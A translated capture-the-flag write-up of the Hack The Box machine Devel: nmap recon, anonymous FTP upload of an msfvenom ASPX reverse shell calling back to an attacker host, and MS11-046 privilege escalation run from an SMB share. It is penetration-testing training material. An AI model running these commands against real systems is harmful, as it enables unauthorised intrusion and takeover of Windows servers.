This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

In this post, we complete the Devel write-up. We connect to FTP with anonymous:anonymous, create an ASPX reverse shell using Msfvenom and escalate privileges through CVE-2011-1249, also known as MS11-046.

Reconnaissance

Port Scanning

We scan the open ports on Devel with nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ cat Puertos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
File: Puertos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap --open -p- -T5 -oG Puertos 10.10.10.5
2Host: 10.10.10.5 () Status: Up
3Host: 10.10.10.5 () Ports: 21/open/tcp//ftp///, 80/open/tcp//http/// Ignored State: filtered (65533)
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Reconocimiento Puertos

{*} Extrayendo puertos...

La direccion ip es: 10.10.10.5
Los puertos abiertos son: 21,80

Los puertos han sido copiados al portapapeles

We run Nmap’s default scripts against the open ports to gather more information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ cat Objetivos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
File: Objetivos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap -sCV -p 21,80 -oN Objetivos 10.10.10.5
2Nmap scan report for 10.10.10.5
3Host is up (0.053s latency).
4
5PORT STATE SERVICE VERSION
621/tcp open ftp Microsoft ftpd
7 │ | ftp-syst:
8 │ |_ SYST: Windows_NT
9 │ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
10 │ | 03-18-17 02:06AM <DIR> aspnet_client
11 │ | 03-17-17 05:37PM 689 iisstart.htm
12 │ |_03-17-17 05:37PM 184946 welcome.png
1380/tcp open http Microsoft IIS httpd 7.5
14 │ |_http-title: IIS7
15 │ | http-methods:
16 │ |_ Potentially risky methods: TRACE
17 │ |_http-server-header: Microsoft-IIS/7.5
18Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

We can access FTP with anonymous:anonymous, and the web server is running Microsoft IIS 7.5; see HackTricks.

FTP

Logging into FTP with anonymous:anonymous appears to place us in the directory containing the web server’s content.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:void4m0n): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49169|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png

We have write permissions, so we can try uploading a reverse shell.

Exploitation

Initial Access

Creating the Reverse Shell

We use msfvenom to create a reverse shell in the executable aspx format used by Microsoft IIS.

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=1234 -f aspx > revshell.aspx

Uploading the Reverse Shell via FTP

We upload revshell.aspx over FTP.

1
2
3
4
5
6
7
ftp> put revshell.aspx 
local: revshell.aspx remote: revshell.aspx
229 Entering Extended Passive Mode (|||49178|)
125 Data connection already open; Transfer starting.
100% |****************************| 2739 28.39 MiB/s --:-- ETA
226 Transfer complete.
2739 bytes sent in 00:00 (18.83 KiB/s)

Receiving the Connection

1 - Listen on the selected port, using rlwrap for a more interactive shell.

1
2
rlwrap nc -lvnp 1234
listening on [any] 1234 ...

2 - Send a GET request to revshell.aspx.

1
curl -s -X GET "http://10.10.10.5/revshell.aspx"

3 - Receive the connection.

1
2
3
4
5
6
7
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.5] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

Privilege Escalation

Once we have a shell, we run systeminfo to identify the exact Windows version.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Host Name:                 DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 5/9/2022, 12:03:54
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.504 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.576 MB
Virtual Memory: In Use: 565 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::85fa:bd6b:8264:8a30
[04]: dead:beef::58c0:f1cf:abc6:bb9e

The relevant lines are OS Name: Microsoft Windows 7 Enterprise and OS Version: 6.1.7600 N/A Build 7600.

A little research leads us to this exploit on Exploit-DB.

1 - Download the script.

1
2
3
4
5
6
7
8
9
10
11
wget -O MS11-046-Privesc.c https://www.exploit-db.com/raw/40564
--2022-09-05 00:21:50-- https://www.exploit-db.com/raw/40564
Resolviendo www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Conectando con www.exploit-db.com (www.exploit-db.com)[192.124.249.13]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: no especificado [text/plain]
Grabando a: «MS11-046-Privesc.c»

MS11-046-Privesc.c [ <=> ] 31,91K --.-KB/s en 0,03s

2022-09-05 00:21:51 (980 KB/s) - «MS11-046-Privesc.c» guardado [32674]

2 - Compile it as an .exe.

1
i686-w64-mingw32-gcc -o MS11-046-Privesc.exe MS11-046-Privesc.c -lws2_32

3 - Start an SMB server in the working directory to share the executable.

1
2
3
4
5
6
7
8
9
impacket-smbserver smbfolder .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

4 - Run the executable over SMB from the victim machine.

1
2
3
4
c:\windows\system32\inetsrv>//10.10.16.2/SMBFOLDER/MS11-046-Privesc.exe

c:\Windows\System32>whoami
nt authority\system

We are nt authority\system!

Flags

User.Txt

1
2
3
4
Directory of c:\Users\babis\Desktop

type user.txt
7b20xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Root.Txt

1
2
3
4
Directory of c:\Users\Administrator\Desktop

type root.txt
5968xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Knowledge Gained

The Devel machine teaches us the following:

  • Port reconnaissance with Nmap.
  • FTP access with anonymous:anonymous.
  • ASPX reverse shells.
  • Sharing resources over SMB.
  • Compiling a script as an .exe on Linux.

Potential Errors

One possible error is the following:

  • If the privilege-escalation exploit fails, remember to compile the script with -lws2_32.

Credits and References

Machine author: ch4p. Thank you for creating Devel and contributing it to the community.